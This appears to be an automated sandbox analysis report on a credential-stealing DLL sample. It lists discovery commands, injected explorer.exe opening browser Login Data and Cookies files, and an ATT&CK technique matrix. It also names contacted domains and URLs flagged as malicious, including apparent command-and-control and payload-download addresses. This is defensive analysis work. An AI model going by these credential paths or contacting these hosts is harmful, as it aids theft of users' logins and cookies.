            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FF8A8CF9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_00007FF8A8CF9AC0
            Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
            Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 00000008.00000000.2321695887.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000008.00000002.4537142552.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2320547106.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000008.00000000.2320112731.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4535485561.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
            Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,3_2_00007FF8A8CFDCBC
            Source: C:\Windows\explorer.exe | Code function: 8_2_0E4D4F14 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_0E4D4F14
            Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000001CEAFC94D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,3_2_000001CEAFC94D00
            Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00007FF8A8DE4A20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF8A8DE4A20
            Source: C:\Windows\explorer.exe | Code function: 8_2_0303891C RtlGetVersion,GetVersionExW,8_2_0303891C
            Source: C:\Windows\System32\nltest.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: WMIC.exe, 00000021.00000002.3489207530.00000156669D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669C5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488726294.00000156669CC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487382704.00000156669CB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488748596.00000156669D0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487514545.0000015666FA1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488702292.00000156669D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000002.3488807709.0000003146307000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ndows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000002.3489251608.0000015666C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: indows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000021.00000003.3488148854.0000015666F80000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489121828.00000156669B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487428020.00000156669B5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000002.3489100566.00000156669AA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487207652.00000156669A7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3487312815.00000156669A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000021.00000003.3488168710.0000015666F81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Windows\explorer.exe | Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | 8_2_0E458848
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies

            Remote Access Functionality

            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4084, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 412, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6564, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts
            131
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            2
            Obfuscated Files or Information
            1
            Credentials In Files
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution
            1
            Windows Service
            1
            Access Token Manipulation
            1
            DLL Side-Loading
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Windows Service
            1
            Masquerading
            NTDS128
            System Information Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script913
            Process Injection
            1
            Valid Accounts
            LSA Secrets1
            Query Registry
            SSHKeylogging114
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials191
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Virtualization/Sandbox Evasion
            DCSync121
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job913
            Process Injection
            Proc Filesystem13
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery
            Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging21
            System Network Configuration Discovery
            Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
            Behavior Graph ID: 1566852, Sample: wait.dll.exe, Startdate: 02/12/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            wait.dll.dll | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
            vutarf.com | 94.232.43.224 | true | true | | unknown
            reateberam.com | 172.67.217.190 | true | true | | unknown
            huanvn.com | 103.57.249.207 | true | true | | unknown
            dogirafer.com | 104.21.68.89 | true | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://reateberam.com/test/ | true | Avira URL Cloud: malware | unknown
            https://dogirafer.com/test/ | true | Avira URL Cloud: safe | unknown
            https://reateberam.com/files/stkm.bin | true | Avira URL Cloud: malware | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
                      https://word.office.comonexplorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://r11.o.lencr.org0rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://dogirafer.com/test/aexplorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reateberam.com/test/4560Dexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://huanvn.com:6542/gop.php6)rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://huanvn.com/rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reateberam.com/test/t60Gexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://excel.office.comexplorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://huanvn.com:6542/gop.phpKrundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.microexplorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                              high
                              https://reateberam.com/test/Xexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://vutarf.com/rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://reateberam.com/explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://x1.i.lewrundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://dogirafer.com/mexplorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://x1.c.lencr.org/0rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, 
rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://x1.i.lencr.org/0rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, 
rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
